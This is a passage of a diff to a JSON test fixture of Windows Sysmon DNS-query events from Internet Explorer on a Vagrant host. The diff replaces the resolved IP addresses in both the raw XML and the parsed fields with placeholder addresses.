Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -541,7 +541,7 @@ } }, "event_data": { - "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.274", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -556,7 +556,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -577,7 +577,7 @@ "event_data": { "QueryName": "cms.analytics.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;", + "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.291", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -596,7 +596,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -606,7 +606,7 @@ "time_created": "2019-07-18T03:34:03.028Z", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.413", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -634,7 +634,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028585600Z'/\u003e\u003cEventRecordID\u003e79\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.424\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eg.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -649,7 +649,7 @@ "ProcessId": "2736", "QueryName": "g.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;", + "QueryResults": "type: 5 g-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "time_created": "2019-07-18T03:34:03.028Z", @@ -675,7 +675,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028900300Z'/\u003e\u003cEventRecordID\u003e80\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.427\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elg3.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -695,7 +695,7 @@ "ProcessId": "2736", "QueryName": "lg3.media.net", "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.427", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -712,7 +712,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029031100Z'/\u003e\u003cEventRecordID\u003e81\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.469\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eservice.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -727,7 +727,7 @@ "time_created": "2019-07-18T03:34:03.029Z", "level": "information", "event_data": { - "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:54.88.96.255;::ffff:34.233.100.168;::ffff:54.209.58.223;", + "QueryResults": "type: 5 service.sp.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.469", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -791,7 +791,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029098400Z'/\u003e\u003cEventRecordID\u003e82\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.485\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -818,7 +818,7 @@ "ProcessId": "2736", "QueryName": "sb.scorecardresearch.com", "QueryStatus": "0", - "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:184.25.176.117;", + "QueryResults": "type: 5 sb.scorecardresearch.com.edgekey.net;type: 5 e1879.e7.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.485", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -830,7 +830,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029112900Z'/\u003e\u003cEventRecordID\u003e83\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.500\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eotf.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 iceotf-prod-fe-tm.trafficmanager.net;type: 5 iceotf-prod-fe-eastus.cloudapp.net;::ffff:40.114.54.223;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 